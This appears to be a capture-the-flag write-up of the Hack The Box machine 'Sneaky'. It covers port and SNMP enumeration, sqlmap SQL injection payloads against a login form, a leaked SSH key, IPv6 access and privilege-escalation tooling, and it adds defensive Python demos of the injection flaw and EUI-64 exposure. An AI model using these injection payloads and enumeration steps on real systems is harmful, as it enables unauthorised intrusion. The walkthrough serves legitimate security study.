Sneaky
Port scan
u505@kali:~/HTB/Machines/Sneaky$ sudo masscan -e tun0 -p1-65535,U:1-65535 --rate 1000 10.10.10.20
[sudo] password for u505:

Starting masscan 1.0.5 at 2020-05-01 13:38:16 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 80/tcp on 10.10.10.20
Discovered open port 161/udp on 10.10.10.20
u505@kali:~/HTB/Machines/Sneaky$ nmap -sC -sV 10.10.10.20
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-01 09:38 EDT
Nmap scan report for sneaky.htb (10.10.10.20)
Host is up (0.040s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Under Development!

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.15 seconds
The full scan found SNMP (UDP 161) open, so we scan that port specifically.
u505@kali:~/HTB/Machines/Sneaky$ sudo nmap -sC -sV -sU -p U:161 10.10.10.20
[sudo] password for u505:
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-03 09:41 EDT
Nmap scan report for sneaky.htb (10.10.10.20)
Host is up (0.038s latency).

PORT    STATE SERVICE VERSION
161/udp open  snmp    SNMPv1 server; net-snmp SNMPv3 server (public)
| snmp-info:
|   enterprise: net-snmp
|   engineIDFormat: unknown
|   engineIDData: fcf2da02d0831859
|   snmpEngineBoots: 8
|_  snmpEngineTime: 7m08s
| snmp-interfaces:
|   lo
|     IP address: 127.0.0.1  Netmask: 255.0.0.0
|     Type: softwareLoopback  Speed: 10 Mbps
|     Traffic stats: 0.00 Kb sent, 0.00 Kb received
|   eth0
|     IP address: 10.10.10.20  Netmask: 255.255.255.0
|     MAC address: 00:50:56:b9:42:6f (VMware)
|     Type: ethernetCsmacd  Speed: 4 Gbps
|_    Traffic stats: 108.03 Kb sent, 136.48 Kb received
| snmp-netstat:
|   TCP  127.0.0.1:3306       0.0.0.0:0
|_  UDP  0.0.0.0:161          *:*
| snmp-processes:
|   1:
|     Name: init
|     Path: /sbin/init
|   405:
|     Name: upstart-udev-br
|     Path: upstart-udev-bridge
|     Params: --daemon
|   409:
|     Name: systemd-udevd
|     Path: /lib/systemd/systemd-udevd
|     Params: --daemon
|   453:
|     Name: dbus-daemon
|     Path: dbus-daemon
|     Params: --system --fork
|   486:
|     Name: systemd-logind
|     Path: /lib/systemd/systemd-logind
|   490:
|     Name: rsyslogd
|     Path: rsyslogd
|   512:
|     Name: upstart-file-br
|     Path: upstart-file-bridge
|     Params: --daemon
|   908:
|     Name: upstart-socket-
|     Path: upstart-socket-bridge
|     Params: --daemon
|   958:
|     Name: getty
|     Path: /sbin/getty
|     Params: -8 38400 tty4
|   961:
|     Name: getty
|     Path: /sbin/getty
|     Params: -8 38400 tty5
|   966:
|     Name: getty
|     Path: /sbin/getty
|     Params: -8 38400 tty2
|   967:
|     Name: getty
|     Path: /sbin/getty
|     Params: -8 38400 tty3
|   970:
|     Name: getty
|     Path: /sbin/getty
|     Params: -8 38400 tty6
|   1002:
|     Name: sshd
|     Path: /usr/sbin/sshd
|     Params: -D
|   1003:
|     Name: atd
|     Path: atd
|   1005:
|     Name: cron
|     Path: cron
|   1006:
|     Name: acpid
|     Path: acpid
|     Params: -c /etc/acpi/events -s /var/run/acpid.socket
|   1054:
|     Name: mysqld
|     Path: /usr/sbin/mysqld
|   1085:
|     Name: snmpd
|     Path: /usr/sbin/snmpd
|     Params: -Lsd -Lf /dev/null -u snmp -g snmp -I -smux mteTrigger mteTriggerConf -p /var/run/snmpd.pid
|   1103:
|     Name: vmtoolsd
|     Path: /usr/bin/vmtoolsd
|   1181:
|     Name: apache2
|     Path: /usr/sbin/apache2
|     Params: -k start
|   1185:
|     Name: apache2
|     Path: /usr/sbin/apache2
|     Params: -k start
|   1186:
|     Name: apache2
|     Path: /usr/sbin/apache2
|     Params: -k start
|   1187:
|     Name: apache2
|     Path: /usr/sbin/apache2
|     Params: -k start
|   1188:
|     Name: apache2
|     Path: /usr/sbin/apache2
|     Params: -k start
|   1189:
|     Name: apache2
|     Path: /usr/sbin/apache2
|     Params: -k start
|   1224:
|     Name: getty
|     Path: /sbin/getty
|_    Params: -8 38400 tty1
| snmp-sysdescr: Linux Sneaky 4.4.0-75-generic #96~14.04.1-Ubuntu SMP Thu Apr 20 11:06:56 UTC 2017 i686
|_  System uptime: 7m7.82s (42782 timeticks)
| snmp-win32-software:
|   accountsservice-0.6.35-0ubuntu7.3; 0-01-01T00:00:00
|   acpid-1:2.0.21-1ubuntu2; 0-01-01T00:00:00
|   adduser-3.113+nmu3ubuntu3; 0-01-01T00:00:00
|   apache2-2.4.7-1ubuntu4.15; 0-01-01T00:00:00
|   apache2-bin-2.4.7-1ubuntu4.15; 0-01-01T00:00:00
|   apache2-data-2.4.7-1ubuntu4.15; 0-01-01T00:00:00
|   apparmor-2.10.95-0ubuntu2.6~14.04.1; 0-01-01T00:00:00
...
|   xz-utils-5.1.1alpha+20120614-2ubuntu2; 0-01-01T00:00:00
|   zerofree-1.0.2-1ubuntu1; 0-01-01T00:00:00
|_  zlib1g-1:1.2.8.dfsg-1ubuntu1; 0-01-01T00:00:00
Service Info: Host: Sneaky

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 97.55 seconds
Web Server
Dirsearch
u505@kali:~/HTB/Machines/Sneaky$ python3 /opt/utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirb/common2.txt -r 1 -e "html,php,txt,js" -f -u http://sneaky.htb

  _|. _ _  _  _  _ _|_    v0.3.9
 (_||| _) (/_(_|| (_| )

Extensions: html, php, txt, js | HTTP method: get | Threads: 10 | Wordlist size: 22974 | Recursion level: 1

Error Log: /opt/utils/dirsearch/logs/errors-20-05-01_13-04-57.log

Target: http://sneaky.htb

[13:04:57] Starting:
[13:04:57] 403 -  282B - /.html
[13:04:57] 403 -  281B - /.php
[13:05:24] 200 -  464B - /dev/
[13:05:39] 403 -  283B - /icons/
[13:05:41] 200 -  183B - /index.html
[13:06:15] 403 -  291B - /server-status/
[13:06:37] Starting: dev/
[13:06:38] 403 -  286B - /dev/.html
[13:06:38] 403 -  285B - /dev/.php
[13:07:22] 200 -  464B - /dev/index.html
[13:08:20] Starting: icons/
[13:08:21] 403 -  287B - /icons/.php
[13:08:21] 403 -  288B - /icons/.html
[13:09:34] 200 -   35KB - /icons/README.html
[13:09:44] 403 -  289B - /icons/small/
[13:10:04] Starting: server-status/

Task Completed
Dirsearch finds only the dev directory.
Dev folder
The dev folder shows a login page.
u505@kali:~/HTB/Machines/Sneaky$ curl http://sneaky.htb/dev/
<!DOCTYPE HTML>
<html>
<head>
<title>Member's Area Only - DEV</title>
</head>
<body>
<h1>Member's Area Only - Login Now!</h1>
<form method="post" action="./login.php">
<input type="text" name="name">
<input type="password" name="pass">
<input type="submit" value="login">
</form>
</body>
</html>
Strangely, dirsearch didn't detect the login.php page.
u505@kali:~/HTB/Machines/Sneaky$ curl -v http://sneaky.htb/dev/login.php
*   Trying 10.10.10.20:80...
* TCP_NODELAY set
* Connected to sneaky.htb (10.10.10.20) port 80 (#0)
> GET /dev/login.php HTTP/1.1
> Host: sneaky.htb
> User-Agent: curl/7.68.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
* HTTP 1.0, assume close after body
< HTTP/1.0 404 Not Found
< Date: Fri, 01 May 2020 13:54:53 GMT
< Server: Apache/2.4.7 (Ubuntu)
< X-Powered-By: PHP/5.5.9-1ubuntu4.21
< Content-Length: 49
< Connection: close
< Content-Type: text/html
<
* Closing connection 0
<?xml version="1.0" encoding="UTF-8"?>Not Found:
The PHP code answers with a 404 status code when no user matches the submitted credentials, which is why dirsearch (which treats 404 as "not found") didn't detect the page.
Sqlmap
We intercept the HTTP request from the login page.
u505@kali:~/HTB/Machines/Sneaky$ cat login.req
POST /dev/login.php HTTP/1.1
Host: sneaky.htb
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://sneaky.htb/dev/
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Connection: close
Upgrade-Insecure-Requests: 1

name=admin&pass=admin
We launch sqlmap at level 1 and risk 1 at first.
u505@kali:~/HTB/Machines/Sneaky$ sqlmap -r login.req
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.4.4#stable}
|_ -| . ["]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 10:37:12 /2020-05-03/

[10:37:12] [INFO] parsing HTTP request from 'login.req'
[10:37:12] [INFO] resuming back-end DBMS 'mysql'
[10:37:12] [INFO] testing connection to the target URL
[10:37:13] [CRITICAL] page not found (404)
it is not recommended to continue in this kind of cases. Do you want to quit and make sure that everything is set up properly? [Y/n] n
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: name (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: name=admin' AND (SELECT 4291 FROM (SELECT(SLEEP(5)))TLhB) AND 'WRmH'='WRmH&pass=admin

Parameter: pass (POST)
    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: name=admin&pass=admin' UNION ALL SELECT CONCAT(0x7162627671,0x41775155705a765749494a414c686c64574e644c6775785144434866786f6e416f4e746741495675,0x716b627a71),NULL-- -
---
there were multiple injection points, please select the one to use for following injections:
[0] place: POST, parameter: name, type: Single quoted string (default)
[1] place: POST, parameter: pass, type: Single quoted string
[q] Quit
> q
[10:37:43] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 1 times
[10:37:43] [ERROR] user quit

[*] ending @ 10:37:43 /2020-05-03/
Sqlmap reports that both parameters appear vulnerable to SQL injection.
Sql Injection
Injecting the name field with a basic tautology-based injection reveals a link to an SSH key.
Injecting the pass field discloses the user list.
u505@kali:~/HTB/Machines/Sneaky$ wget http://sneaky.htb/dev/sshkeyforadministratordifficulttimes
--2020-05-01 10:10:10--  http://sneaky.htb/dev/sshkeyforadministratordifficulttimes
Resolving sneaky.htb (sneaky.htb)... 10.10.10.20
Connecting to sneaky.htb (sneaky.htb)|10.10.10.20|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1675 (1.6K)
Saving to: ‘sshkeyforadministratordifficulttimes’

sshkeyforadministra 100%[===================>]   1.64K  --.-KB/s    in 0s

2020-05-01 10:10:10 (88.8 MB/s) - ‘sshkeyforadministratordifficulttimes’ saved [1675/1675]

u505@kali:~/HTB/Machines/Sneaky$ chmod 600 sshkeyforadministratordifficulttimes
u505@kali:~/HTB/Machines/Sneaky$ ssh -i sshkeyforadministratordifficulttimes thrasivoulos@sneaky.htb
ssh: connect to host sneaky.htb port 22: Connection refused
We have the key, but the server isn't listening on the SSH port.
Snmp server
MIBs installation
At first I ran snmpwalk without MIBs, but I downloaded them to get a friendlier output.
u505@kali:~/HTB/Machines/Sneaky$ sudo apt install snmp-mibs-downloader
u505@kali:~/HTB/Machines/Sneaky$ sudo vi /etc/snmp/snmp.conf
u505@kali:~/HTB/Machines/Sneaky$ cat /etc/snmp/snmp.conf
# As the snmp packages come without MIB files due to license reasons, loading
# of MIBs is disabled by default. If you added the MIBs you can reenable
# loading them by commenting out the following line.
#mibs :

# If you want to globally change where snmp libraries, commands and daemons
# look for MIBS, change the line below. Note you can set this for individual
# tools with the -M option or MIBDIRS environment variable.
#
#mibdirs /usr/share/snmp/mibs:/usr/share/snmp/mibs/iana:/usr/share/snmp/mibs/ietf
Full snmpwalk
u505@kali:~/HTB/Machines/Sneaky$ snmpwalk -v 2c -c public 10.10.10.20 > snmpwalk
u505@kali:~/HTB/Machines/Sneaky$ view snmpwalk
...
SNMPv2-MIB::sysDescr.0 = STRING: Linux Sneaky 4.4.0-75-generic #96~14.04.1-Ubuntu SMP Thu Apr 20 11:06:56 UTC 2017 i686
...
IF-MIB::ifPhysAddress.2 = STRING: 0:50:56:b9:42:6f
...
IP-MIB::ipAddressIfIndex.ipv4."10.10.10.20" = INTEGER: 2
IP-MIB::ipAddressIfIndex.ipv4."10.10.10.255" = INTEGER: 2
IP-MIB::ipAddressIfIndex.ipv4."127.0.0.1" = INTEGER: 1
IP-MIB::ipAddressIfIndex.ipv6."00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:01" = INTEGER: 1
IP-MIB::ipAddressIfIndex.ipv6."de:ad:be:ef:00:00:00:00:02:50:56:ff:fe:b9:42:6f" = INTEGER: 2
IP-MIB::ipAddressIfIndex.ipv6."fe:80:00:00:00:00:00:00:02:50:56:ff:fe:b9:42:6f" = INTEGER: 2
...
HOST-RESOURCES-MIB::hrSWRunPath.1 = STRING: "/sbin/init"
HOST-RESOURCES-MIB::hrSWRunPath.405 = STRING: "upstart-udev-bridge"
HOST-RESOURCES-MIB::hrSWRunPath.409 = STRING: "/lib/systemd/systemd-udevd"
HOST-RESOURCES-MIB::hrSWRunPath.453 = STRING: "dbus-daemon"
HOST-RESOURCES-MIB::hrSWRunPath.486 = STRING: "/lib/systemd/systemd-logind"
HOST-RESOURCES-MIB::hrSWRunPath.490 = STRING: "rsyslogd"
HOST-RESOURCES-MIB::hrSWRunPath.512 = STRING: "upstart-file-bridge"
HOST-RESOURCES-MIB::hrSWRunPath.908 = STRING: "upstart-socket-bridge"
HOST-RESOURCES-MIB::hrSWRunPath.958 = STRING: "/sbin/getty"
HOST-RESOURCES-MIB::hrSWRunPath.961 = STRING: "/sbin/getty"
HOST-RESOURCES-MIB::hrSWRunPath.966 = STRING: "/sbin/getty"
HOST-RESOURCES-MIB::hrSWRunPath.967 = STRING: "/sbin/getty"
HOST-RESOURCES-MIB::hrSWRunPath.970 = STRING: "/sbin/getty"
HOST-RESOURCES-MIB::hrSWRunPath.1002 = STRING: "/usr/sbin/sshd"
HOST-RESOURCES-MIB::hrSWRunPath.1003 = STRING: "atd"
HOST-RESOURCES-MIB::hrSWRunPath.1005 = STRING: "cron"
HOST-RESOURCES-MIB::hrSWRunPath.1006 = STRING: "acpid"
HOST-RESOURCES-MIB::hrSWRunPath.1054 = STRING: "/usr/sbin/mysqld"
HOST-RESOURCES-MIB::hrSWRunPath.1085 = STRING: "/usr/sbin/snmpd"
HOST-RESOURCES-MIB::hrSWRunPath.1103 = STRING: "/usr/bin/vmtoolsd"
HOST-RESOURCES-MIB::hrSWRunPath.1181 = STRING: "/usr/sbin/apache2"
HOST-RESOURCES-MIB::hrSWRunPath.1185 = STRING: "/usr/sbin/apache2"
HOST-RESOURCES-MIB::hrSWRunPath.1186 = STRING: "/usr/sbin/apache2"
HOST-RESOURCES-MIB::hrSWRunPath.1187 = STRING: "/usr/sbin/apache2"
HOST-RESOURCES-MIB::hrSWRunPath.1188 = STRING: "/usr/sbin/apache2"
HOST-RESOURCES-MIB::hrSWRunPath.1189 = STRING: "/usr/sbin/apache2"
HOST-RESOURCES-MIB::hrSWRunPath.1224 = STRING: "/sbin/getty"
HOST-RESOURCES-MIB::hrSWRunPath.1381 = STRING: "/usr/sbin/apache2"
HOST-RESOURCES-MIB::hrSWRunParameters.1 = ""
HOST-RESOURCES-MIB::hrSWRunParameters.405 = STRING: "--daemon"
HOST-RESOURCES-MIB::hrSWRunParameters.409 = STRING: "--daemon"
HOST-RESOURCES-MIB::hrSWRunParameters.453 = STRING: "--system --fork"
HOST-RESOURCES-MIB::hrSWRunParameters.486 = ""
HOST-RESOURCES-MIB::hrSWRunParameters.490 = ""
HOST-RESOURCES-MIB::hrSWRunParameters.512 = STRING: "--daemon"
HOST-RESOURCES-MIB::hrSWRunParameters.908 = STRING: "--daemon"
HOST-RESOURCES-MIB::hrSWRunParameters.958 = STRING: "-8 38400 tty4"
HOST-RESOURCES-MIB::hrSWRunParameters.961 = STRING: "-8 38400 tty5"
HOST-RESOURCES-MIB::hrSWRunParameters.966 = STRING: "-8 38400 tty2"
HOST-RESOURCES-MIB::hrSWRunParameters.967 = STRING: "-8 38400 tty3"
HOST-RESOURCES-MIB::hrSWRunParameters.970 = STRING: "-8 38400 tty6"
HOST-RESOURCES-MIB::hrSWRunParameters.1002 = STRING: "-D"
HOST-RESOURCES-MIB::hrSWRunParameters.1003 = ""
HOST-RESOURCES-MIB::hrSWRunParameters.1005 = ""
HOST-RESOURCES-MIB::hrSWRunParameters.1006 = STRING: "-c /etc/acpi/events -s /var/run/acpid.socket"
HOST-RESOURCES-MIB::hrSWRunParameters.1054 = ""
HOST-RESOURCES-MIB::hrSWRunParameters.1085 = STRING: "-Lsd -Lf /dev/null -u snmp -g snmp -I -smux mteTrigger mteTriggerConf -p /var/run/snmpd.pid"
HOST-RESOURCES-MIB::hrSWRunParameters.1103 = ""
HOST-RESOURCES-MIB::hrSWRunParameters.1181 = STRING: "-k start"
HOST-RESOURCES-MIB::hrSWRunParameters.1185 = STRING: "-k start"
HOST-RESOURCES-MIB::hrSWRunParameters.1186 = STRING: "-k start"
HOST-RESOURCES-MIB::hrSWRunParameters.1187 = STRING: "-k start"
HOST-RESOURCES-MIB::hrSWRunParameters.1188 = STRING: "-k start"
HOST-RESOURCES-MIB::hrSWRunParameters.1189 = STRING: "-k start"
HOST-RESOURCES-MIB::hrSWRunParameters.1224 = STRING: "-8 38400 tty1"
HOST-RESOURCES-MIB::hrSWRunParameters.1381 = STRING: "-k start"
...
The SSH server (sshd -D) is running, and the walk also reveals an IPv6 address.
User Flag
With SNMP, we list the host's IP addresses.
u505@kali:~/HTB/Machines/Sneaky$ snmpwalk -v 2c -c public 10.10.10.20 "IP-MIB::ipAddressIfIndex.ipv4"
IP-MIB::ipAddressIfIndex.ipv4."10.10.10.20" = INTEGER: 2
IP-MIB::ipAddressIfIndex.ipv4."10.10.10.255" = INTEGER: 2
IP-MIB::ipAddressIfIndex.ipv4."127.0.0.1" = INTEGER: 1
u505@kali:~/HTB/Machines/Sneaky$ snmpwalk -v 2c -c public 10.10.10.20 "IP-MIB::ipAddressIfIndex.ipv6"
IP-MIB::ipAddressIfIndex.ipv6."00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:01" = INTEGER: 1
IP-MIB::ipAddressIfIndex.ipv6."de:ad:be:ef:00:00:00:00:02:50:56:ff:fe:b9:42:6f" = INTEGER: 2
IP-MIB::ipAddressIfIndex.ipv6."fe:80:00:00:00:00:00:00:02:50:56:ff:fe:b9:42:6f" = INTEGER: 2
If we run nmap against the IPv6 address, the ssh port is available.
u505@kali:~/HTB/Machines/Sneaky$ nmap -6 -sC -sV dead:beef::250:56ff:feb9:426f
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-02 11:21 EDT
Nmap scan report for dead:beef::250:56ff:feb9:426f
Host is up (0.037s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 5d:5d:2a:97:85:a1:20:e2:26:e4:13:54:58:d6:a4:22 (DSA)
|   2048 a2:00:0e:99:0f:d3:ed:b0:19:d4:6b:a8:b1:93:d9:87 (RSA)
|   256 e3:29:c4:cb:87:98:df:99:6f:36:9f:31:50:e3:b9:42 (ECDSA)
|_  256 e6:85:a8:f8:62:67:f7:01:28:a1:aa:00:b5:60:f2:21 (ED25519)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: 400 Bad Request
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| address-info:
|   IPv6 EUI-64:
|     MAC address:
|       address: 00:50:56:b9:42:6f
|_      manuf: VMware

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.34 seconds
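The two steps above (reading addresses out of IP-MIB::ipAddressIfIndex and nmap's observation that the IPv6 address is EUI-64 derived from the MAC) are the whole reason the "hidden" SSH port is reachable: the service is filtered on IPv4 only, and a default SNMP community string hands out the IPv6 address. The following added example (not part of the original writeup) shows how a defender auditing such exposure can parse snmpwalk output, decode net-snmp's colon-separated 16-octet IPv6 index, and check which non-link-local IPv6 addresses carry a modified EUI-64 interface identifier for a given MAC. The walk lines are constructed to match the shape of the writeup's output, and the function names are this example's own.

```python
import ipaddress
import re

# Constructed sample: snmpwalk lines in the same shape as the writeup's output.
SAMPLE_WALK = """\
IP-MIB::ipAddressIfIndex.ipv4."10.10.10.20" = INTEGER: 2
IP-MIB::ipAddressIfIndex.ipv4."127.0.0.1" = INTEGER: 1
IP-MIB::ipAddressIfIndex.ipv6."00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:01" = INTEGER: 1
IP-MIB::ipAddressIfIndex.ipv6."de:ad:be:ef:00:00:00:00:02:50:56:ff:fe:b9:42:6f" = INTEGER: 2
IP-MIB::ipAddressIfIndex.ipv6."fe:80:00:00:00:00:00:00:02:50:56:ff:fe:b9:42:6f" = INTEGER: 2
"""

LINE_RE = re.compile(
    r'ipAddressIfIndex\.(ipv4|ipv6)\."([^"]+)"\s*=\s*INTEGER:\s*(\d+)'
)


def parse_walk(text):
    """Return [(ifIndex, ip_address_object), ...] from ipAddressIfIndex walk lines."""
    entries = []
    for line in text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue
        family, raw, ifindex = m.groups()
        if family == "ipv4":
            addr = ipaddress.IPv4Address(raw)
        else:
            # net-snmp prints the 16-byte IPv6 index as colon-separated octets,
            # not as a textual IPv6 address, so rebuild it from the bytes.
            addr = ipaddress.IPv6Address(bytes(int(o, 16) for o in raw.split(":")))
        entries.append((int(ifindex), addr))
    return entries


def eui64_interface_id(mac):
    """Modified EUI-64 interface identifier (RFC 4291, Appendix A) for a 48-bit MAC:
    flip the universal/local bit of the first octet and insert ff:fe in the middle."""
    octets = bytes(int(o, 16) for o in mac.split(":"))
    if len(octets) != 6:
        raise ValueError("expected a 48-bit MAC address")
    return bytes([octets[0] ^ 0x02]) + octets[1:3] + b"\xff\xfe" + octets[3:]


def slaac_addresses(entries, mac):
    """Return the routable-looking (non-loopback, non-link-local) IPv6 addresses whose
    interface identifier was auto-configured from `mac`. These are the addresses an
    IPv4-only firewall rule does nothing about."""
    iid = eui64_interface_id(mac)
    matches = []
    for _ifindex, addr in entries:
        if addr.version != 6 or addr.is_loopback or addr.is_link_local:
            continue
        if addr.packed[8:] == iid:
            matches.append(str(addr))
    return matches


if __name__ == "__main__":
    walk = parse_walk(SAMPLE_WALK)
    for ifindex, addr in walk:
        print(f"if {ifindex}: {addr}")
    print("SLAAC addresses for 00:50:56:b9:42:6f:",
          slaac_addresses(walk, "00:50:56:b9:42:6f"))
```

The check the last function performs is the same inference nmap's address-info script made: the lower 64 bits of dead:beef::250:56ff:feb9:426f are 02:50:56:ff:fe:b9:42:6f, i.e. the VMware MAC with its U/L bit flipped and ff:fe inserted, so anyone who learns the MAC (via SNMP, ARP or a neighbour table) can predict the address. Treat SNMP community strings as credentials and apply host firewall rules to both address families.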
We ssh into the server.
u505@kali:~/HTB/Machines/Sneaky$ ssh -i sshkeyforadministratordifficulttimes thrasivoulos@dead:beef::0250:56ff:feb9:426f
The authenticity of host 'dead:beef::250:56ff:feb9:426f (dead:beef::250:56ff:feb9:426f)' can't be established.
ECDSA key fingerprint is SHA256:KCwXgk+ryPhJU+UhxyHAO16VCRFrty3aLPWPSkq/E2o.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'dead:beef::250:56ff:feb9:426f' (ECDSA) to the list of known hosts.
Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 4.4.0-75-generic i686)

 * Documentation:  https://help.ubuntu.com/

  System information as of Sun May  3 16:38:21 EEST 2020

  System load: 0.0               Memory usage: 4%   Processes:       176
  Usage of /:  9.9% of 18.58GB   Swap usage:   0%   Users logged in: 0

  Graph this data and manage this system at:
    https://landscape.canonical.com/

Your Hardware Enablement Stack (HWE) is supported until April 2019.
Last login: Sun May 14 20:22:53 2017 from dead:beef:1::1077
thrasivoulos@Sneaky:~$ cat user.txt
<USER_FLAG>
Enumeration
thrasivoulos@Sneaky:~$ id
uid=1000(thrasivoulos) gid=1000(thrasivoulos) groups=1000(thrasivoulos),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lpadmin),111(sambashare)

u505@kali:~/HTB/Machines/Sneaky$ mkdir www
u505@kali:~/HTB/Machines/Sneaky$ cd www/
u505@kali:~/HTB/Machines/Sneaky/www$ cp /opt/utils/privilege-escalation-awesome-scripts-suite/linPEAS/linpeas.sh ./
u505@kali:~/HTB/Machines/Sneaky/www$ cp /opt/utils/LinEnum/LinEnum.sh ./
u505@kali:~/HTB/Machines/Sneaky/www$ cp /opt/utils/pspy/pspy32 ./
u505@kali:~/HTB/Machines/Sneaky/www$ scp -i ../sshkeyforadministratordifficulttimes * thrasivoulos@[dead:beef::0250:56ff:feb9:426f]:/tmp/
LinEnum.sh                                    100%   46KB 375.4KB/s   00:00
linpeas.sh                                    100%  208KB   1.6MB/s   00:00
pspy32                                        100% 2594KB   4.6MB/s   00:00
thrasivoulos@Sneaky:/var/www/html/dev$ cat login.php
<?php
$name = isset($_POST['name']) ? $_POST['name'] : '';
$pass = isset($_POST['pass']) ? $_POST['pass'] : '';
?>
<?php echo '<?xml version="1.0" encoding="UTF-8"?>' ?>
<?php
$link = new PDO('mysql:dbname=dev;host=localhost', 'root', 'sup3rs3cr3tp4ssf0rmysql');

// Both POST fields are interpolated directly into the query: this is the injection point.
$sql = "SELECT * FROM users WHERE name = '{$name}' AND pass = '{$pass}' ";
/*
$sql = 'SELECT * FROM users WHERE ' .
    "name = '" . mysqli_real_escape_string($name, $link) . "' " .
    "AND pass = '" . mysqli_real_escape_string($pass, $link) . "'";
*/

$result = $link->query($sql);

// A query error (e.g. an unbalanced quote) yields a 500 response.
if (!$result) {
    header('HTTP/1.0 500 Internal Serever Error');
    echo 'Internal Serever Error: ';
    exit;
}

// No matching row yields a 404, which is why dirsearch never saw this page.
while ($row = $result->fetch(PDO::FETCH_ASSOC)) {
    $rows[] = $row;
}
if (empty($rows)) {
    header('HTTP/1.0 404 Not Found');
    echo 'Not Found: ';
    exit;
} else {
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xml:lang="ja" xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>DevWebsite</title>
</head>
<body>
<h1>DevWebsite Login</h1>
<?php foreach ($rows as $row) { ?>
<dt>
<dl>name: <?php echo htmlspecialchars($row['name'], ENT_QUOTES, 'UTF-8'); ?></dl>
</dt>
<?php } } ?>
<p>
<p>
<p>
<p><center><a href="sshkeyforadministratordifficulttimes">My Key</a></center>
<p><center>Noone is ever gonna find this key :P</center>
<br>
</body>
</html>
<br>
<br>
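The login.php source explains everything observed earlier: credentials are concatenated into the SQL string, a failed login returns 404 (hiding the page from dirsearch), a malformed query returns 500, and a successful one echoes every matching row's name. The added example below (my own code, not the target's; it stands in a SQLite in-memory table for the target's MySQL `dev.users` table, with constructed placeholder passwords) reproduces that logic in Python next to a parameterised version, so the effect of the tautology in the pass field (full user list) and of a comment in the name field (one user, no password) can be seen alongside the fix. Function names are this example's own.

```python
import sqlite3

# Constructed stand-in for the target's dev.users table; names are from the writeup,
# passwords are placeholders.
SAMPLE_USERS = [("admin", "placeholder-pass-1"), ("thrasivoulos", "placeholder-pass-2")]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, pass TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    return conn


def login_vulnerable(conn, name, password):
    """Mirrors login.php: string interpolation, 500 on SQL error, 404 on no rows,
    200 plus the matched names otherwise. Returns (status, [names])."""
    sql = f"SELECT name FROM users WHERE name = '{name}' AND pass = '{password}'"
    try:
        rows = conn.execute(sql).fetchall()
    except sqlite3.Error:
        return 500, []          # unbalanced quote etc. -> the page's 500 path
    if not rows:
        return 404, []          # the status that hid the page from dirsearch
    return 200, sorted(r[0] for r in rows)


def login_hardened(conn, name, password):
    """Same check with a parameterised query: user input can never become SQL.
    A failed login answers 401, so scanners and logs see the endpoint as what it is."""
    sql = "SELECT name FROM users WHERE name = ? AND pass = ?"
    rows = conn.execute(sql, (name, password)).fetchall()
    if not rows:
        return 401, []
    return 200, sorted(r[0] for r in rows)


if __name__ == "__main__":
    conn = make_db()
    cases = [
        ("admin", "placeholder-pass-1"),   # valid credentials
        ("admin", "wrong"),                # wrong password
        ("admin'", "x"),                   # breaks the query -> 500 (error oracle)
        ("admin' -- ", "x"),               # comments out the password check
        ("x", "' OR '1'='1"),              # tautology in pass: every row matches
    ]
    for name, password in cases:
        print(f"{name!r:22} {password!r:22} vulnerable={login_vulnerable(conn, name, password)} "
              f"hardened={login_hardened(conn, name, password)}")
```

The hardened version leaves the application behaviour unchanged for real users while removing both the data-disclosure path and the error-code oracle; note that the commented-out escaping in the original would not have compiled anyway (mysqli_real_escape_string is the mysqli API, called with reversed arguments, on a PDO handle), and parameterised statements are the correct fix regardless of driver.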
We access the database.
